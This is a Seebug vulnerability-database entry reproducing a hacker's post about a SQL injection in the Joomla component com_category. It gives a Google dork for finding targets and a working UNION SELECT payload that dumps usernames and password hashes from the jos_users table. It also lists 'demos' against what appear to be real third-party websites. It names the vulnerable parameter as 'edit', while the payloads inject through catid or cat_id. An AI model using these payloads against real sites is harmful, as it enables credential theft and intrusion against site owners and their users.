Joomla component 'com_category' SQL injection vulnerability

2009-07-12T00:00:00
ID SSV:11792
Type seebug
Reporter Root
Modified 2009-07-12T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ###############################################################
# #
# Joomla component 'com_category' SQL injection vulnerability #
###############################################################
# ######## #
#dork:inurl:"com_category"
# ######## #
# xploited by Prince_Pwn3r #
# ######## #
# contact: 2p0wn0rN0t2p0wn@gmail.com #
###############################################################

+++++++ greetz to all p0wnbox.com members !!! +++++++
--------------------------------------------------------------------------------------

Vulnerable joomla component : com_category
vulnerable parameter: "edit" ($_GET)

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Exploit :


http://www.site.com/index.php?option=com_category&task=loadCategory&catid*=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users--

Demos :

http://www.p.com.au/index.php?option=com_category&task=loadCategory&catid=-9999+AND+1=0+union+all+select%201,2,group_concat(username,0x3a,password),4,5+from+jos_users--
or
http://ndsay.com/index.php?option=com_category&id=12&task=view&color=3&cat_id=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users--

*could be different (eg: view&color=3&cat_id=)